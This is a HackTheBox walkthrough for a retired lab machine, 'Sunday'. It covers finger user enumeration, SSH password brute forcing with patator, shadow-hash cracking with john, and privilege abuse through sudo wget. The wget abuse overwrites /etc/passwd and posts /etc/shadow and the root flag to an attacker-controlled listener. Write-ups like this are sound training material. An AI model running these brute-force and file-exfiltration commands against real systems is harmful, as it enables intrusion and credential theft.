This series will follow my exercises in HackTheBox. All published writeups are for retired HTB machines. Whether or not I use Metasploit to pwn the server will be indicated in the title.
Sunday
Difficulty: Easy
Machine IP: 10.10.10.76
It takes about half an hour for the full port scan to complete.
artis3n@kali-pop:~/shares/htb/sunday$ sudo nmap -sS -T4 -p- 10.10.10.76
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 15:58 EDT
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.25% done
Warning: 10.10.10.76 giving up on port because retransmission cap hit (6).
Stats: 0:01:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 4.13% done; ETC: 16:28 (0:29:02 remaining)
Stats: 0:02:28 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 8.24% done; ETC: 16:28 (0:27:40 remaining)
Stats: 0:03:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 11.57% done; ETC: 16:27 (0:26:22 remaining)
Stats: 0:06:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 22.01% done; ETC: 16:27 (0:22:52 remaining)
Stats: 0:09:59 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 34.52% done; ETC: 16:27 (0:18:58 remaining)
Stats: 0:16:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 56.46% done; ETC: 16:26 (0:12:30 remaining)
Stats: 0:17:42 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 61.92% done; ETC: 16:26 (0:10:53 remaining)
Stats: 0:22:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 77.37% done; ETC: 16:26 (0:06:27 remaining)
Stats: 0:25:51 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 91.06% done; ETC: 16:26 (0:02:32 remaining)
Nmap scan report for 10.10.10.76
Host is up (0.013s latency).
Not shown: 55470 closed ports, 10060 filtered ports
PORT STATE SERVICE
79/tcp open finger
111/tcp open rpcbind
22022/tcp open unknown
35809/tcp open unknown
56550/tcp open unknown
From there I can dig into the ports.
artis3n@kali-pop:~/shares/htb/sunday$ sudo nmap -sS -T4 -A -p 79,111,22022,35809,56550 10.10.10.76
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 16:32 EDT
Nmap scan report for 10.10.10.76
Host is up (0.050s latency).
PORT STATE SERVICE VERSION
79/tcp open finger?
|_finger: No one logged on\x0D
| fingerprint-strings:
| GenericLines:
| No one logged on
| HTTPOptions:
| Login Name TTY Idle When Where
| OPTIONS ???
| HTTP/1.0 ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
|_ RTSP/1.0 ???
111/tcp open rpcbind 2-4 (RPC #100000)
22022/tcp open ssh SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
35809/tcp open unknown
56550/tcp open unknown
Notably:
- A
fingerservice is running ontcp/79. - SSH is running on
tcp/22022
finger is not something I was familiar with before this box, so I had a lot of learning to do.
finger is used to enumerate information about system users.
I can enumerate users on the system with:
artis3n@kali-pop:~/shares/htb/sunday$ finger [email protected]
Login Name TTY Idle When Where
xvm xVM User < . . . . >
openldap OpenLDAP User < . . . . >
nobody NFS Anonymous Access < . . . . >
noaccess No Access User < . . . . >
nobody4 SunOS 4.x NFS Anonym < . . . . >
Well, that didn’t work.
I eventually found finger-user-enum.pl.
This will take a long time to run, but it eventually finds a sunny user.
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76 | less -S
The official write-up includes the discovery of another user on the system, sammy, but I wasn’t able to find it myself.
With these two users, I can use patator to brute force an SSH login.
patator ssh_login host=10.10.10.76 port=22022 password=FILE0 0=/usr/share/seclists/Passwords/probable-v2-top1575.txt user=sunny -x ignore:mesg='Authentication failed.'
This also takes a while but eventually I get a valid SSH session.
18:12:16 patator INFO - 1 23 30.028 | gemini | 208 | Authentication timeout.
18:12:25 patator INFO - 1 23 30.026 | beauty | 794 | Authentication timeout.
18:12:46 patator INFO - 1 23 30.021 | butterfly | 218 | Authentication timeout.
18:12:53 patator INFO - 0 19 0.036 | sunday | 880 | SSH-2.0-Sun_SSH_1.3
18:12:55 patator INFO - 1 23 30.022 | denver | 804 | Authentication timeout.
18:13:16 patator INFO - 1 23 30.023 | apples | 228 | Authentication timeout.
18:13:25 patator INFO - 1 23 30.024 | jeffrey | 814 | Authentication timeout.
18:13:46 patator INFO - 1 23 30.015 | arthur | 238 | Authentication timeou
Looks like the password for sunny is sunday.
Trying to SSH onto the server results in a key negotiation failure:
artis3n@kali-pop:~/shares/htb/sunday$ ssh -p 22022 [email protected]
Unable to negotiate with 10.10.10.76 port 22022: no matching key exchange method found.
Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
I just need to choose any of the offered key exchange algorithms and I can SSH onto the box.
ssh -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
The authenticity of host '[10.10.10.76]:22022 ([10.10.10.76]:22022)' can't be established.
RSA key fingerprint is SHA256:TmRO9yKIj8Rr/KJIZFXEVswWZB/hic/jAHr78xGp+YU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.10.76]:22022' (RSA) to the list of known hosts.
Password:
Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sunny@sunday:~$
The sunny user does not have a user.txt flag, so it must be under sammy.
sunny can run a troll script as root, which doesn’t enable anything.
Troll, indeed.
sunny@sunday:/backup$ sudo -l
User sunny may run the following commands on this host:
(root) NOPASSWD: /root/troll
ls -la highlights a backup directory in the system root.
sunny@sunday:/backup$ ls -la /
total 527
drwxr-xr-x 26 root root 27 2018-04-24 12:57 .
drwxr-xr-x 26 root root 27 2018-04-24 12:57 ..
drwxr-xr-x 2 root root 4 2018-04-15 20:44 backup
lrwxrwxrwx 1 root root 9 2018-04-15 19:52 bin -> ./usr/bin
drwxr-xr-x 6 root sys 7 2018-04-15 19:52 boot
drwxr-xr-x 2 root root 2 2018-04-16 15:33 cdrom
drwxr-xr-x 85 root sys 265 2020-06-21 20:00 dev
drwxr-xr-x 4 root sys 10 2020-06-21 20:00 devices
drwxr-xr-x 77 root sys 224 2020-06-21 20:00 etc
drwxr-xr-x 3 root root 3 2018-04-15 19:44 export
dr-xr-xr-x 1 root root 1 2020-06-21 20:00 home
drwxr-xr-x 19 root sys 20 2018-04-15 19:45 kernel
drwxr-xr-x 10 root bin 180 2018-04-15 19:45 lib
drwx------ 2 root root 2 2009-05-14 21:27 lost+found
drwxr-xr-x 2 root root 4 2020-06-21 20:00 media
drwxr-xr-x 2 root sys 2 2018-04-15 19:52 mnt
dr-xr-xr-x 1 root root 1 2020-06-21 20:00 net
drwxr-xr-x 4 root sys 4 2018-04-15 19:52 opt
drwxr-xr-x 5 root sys 5 2009-05-14 21:21 platform
dr-xr-xr-x 54 root root 480032 2020-06-21 21:23 proc
drwx------ 6 root root 13 2018-04-24 10:31 root
drwxr-xr-x 4 root root 4 2018-04-15 19:52 rpool
drwxr-xr-x 2 root sys 58 2018-04-15 19:53 sbin
drwxr-xr-x 4 root root 4 2009-05-14 21:18 system
drwxrwxrwt 4 root sys 384 2020-06-21 20:01 tmp
drwxr-xr-x 30 root sys 44 2018-04-15 19:46 usr
drwxr-xr-x 35 root sys 35 2018-04-15 20:26 var
Navigating there, I find a shadow.backup file which seems to be a copy of /etc/shadow.
It includes the sammy user’s password hash.
sunny@sunday:~$ cd /backup
sunny@sunday:/backup$ ls -la
total 5
drwxr-xr-x 2 root root 4 2018-04-15 20:44 .
drwxr-xr-x 26 root root 27 2018-04-24 12:57 ..
-r-x--x--x 1 root root 53 2018-04-24 10:35 agent22.backup
-rw-r--r-- 1 root root 319 2018-04-15 20:44 shadow.backup
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
john is able to make quick work of the hash.
➜ john shadow.txt --wordlist=/home/artis3n/Documents/SecLists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude! (sammy)
1g 0:00:00:13 DONE (2020-06-21 17:21) 0.07462g/s 15589p/s 15589c/s 15589C/s dominique15..153462
Use the "--show" option to display all of the cracked passwords reliably
Session completed
I can now SSH onto the box as sammy with the password cooldude!.
sammy can run wget as root.
sammy@sunday:~$ sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget
I can use this to overwrite a file on the file system.
GTFOBins has some examples.
One option is to overwrite the /root/troll script that sunny has access to execute.
But, I’d like to go even simpler.
Let’s look at /etc/passwd.
sammy@sunday:~$ cat /etc/passwd
root❌0:0:Super-User:/root:/usr/bin/bash
daemon❌1:1::/:
bin❌2:2::/usr/bin:
sys❌3:3::/:
adm❌4:4:Admin:/var/adm:
lp❌71:8:Line Printer Admin:/usr/spool/lp:
uucp❌5:5:uucp Admin:/usr/lib/uucp:
nuucp❌9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
dladm❌15:3:Datalink Admin:/:
smmsp❌25:25:SendMail Message Submission Program:/:
listen❌37:4:Network Admin:/usr/net/nls:
gdm❌50:50:GDM Reserved UID:/:
zfssnap❌51:12:ZFS Automatic Snapshots Reserved UID:/:/usr/bin/pfsh
xvm❌60:60:xVM User:/:
mysql❌70:70:MySQL Reserved UID:/:
openldap❌75:75:OpenLDAP User:/:
webservd❌80:80:WebServer Reserved UID:/:
postgres❌90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
svctag❌95:12:Service Tag UID:/:
nobody❌60001:60001:NFS Anonymous Access User:/:
noaccess❌60002:60002:No Access User:/:
nobody4❌65534:65534:SunOS 4.x NFS Anonymous Access User:/:
sammy❌101:10:sammy:/export/home/sammy:/bin/bash
sunny❌65535:1☀️/export/home/sunny:/bin/bash
I copy this down and modify it locally so that root now has a password defined as root.
root:root:0:0:Super-User:/root:/usr/bin/bash
Now I can call wget as the sammy user and overwrite /etc/passwd.
sudo wget http://10.10.14.41:8000/passwd -O /etc/passwd
Hmm… this didn’t work.
I imagine there is a root password hash in the real /etc/shadow taking precedence.
So much for simpler.
I could go back to /root/troll but now I want to beat this.
I opt to stream /etc/shadow’s contents off the target.
I set up a netcat listener on my host:
artis3n@kali-pop:~/shares/htb/sunday$ sudo nc -lvnp 80 > shadow
listening on [any] 80 ...
connect to [10.10.14.41] from (UNKNOWN) [10.10.10.76] 53870
^C
On the target, I post the file with wget:
sammy@sunday:~$ sudo /usr/bin/wget --post-file=/etc/shadow 10.10.14.41
--21:41:02-- http://10.10.14.41/
=> `index.html'
Connecting to 10.10.14.41:80... connected.
HTTP request sent, awaiting response... No data received.
I now have the contents of /etc/shadow.
artis3n@kali-pop:~/shares/htb/sunday$ cat shadow
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.14.41
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 634
root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:14146::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
dladm:*LK*:::::::
smmsp:NP:6445::::::
listen:*LK*:::::::
gdm:*LK*:::::::
zfssnap:NP:::::::
xvm:*LK*:6445::::::
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
I move the root hash to a file of its own and try to crack it with john.
john root_pass --wordlist=/home/artis3n/Documents/SecLists/Passwords/Leaked-Databases/rockyou.txt
This does not work, nor does a few other wordlists.
I admit defeat.
I opt to grab the root flag off the device with wget.
sammy@sunday:~$ sudo /usr/bin/wget --post-file=/root/root.txt 10.10.14.41
--21:49:39-- http://10.10.14.41/
=> `index.html'
Connecting to 10.10.14.41:80... connected.
HTTP request sent, awaiting response...
artis3n@kali-pop:~/shares/htb/sunday$ sudo nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.41] from (UNKNOWN) [10.10.10.76] 63352
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.14.41
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
fb40fab61d99d37536daeec0d97af9b8
I did not feel confident walking away from this box, but at the end of the day I got the flags that I needed.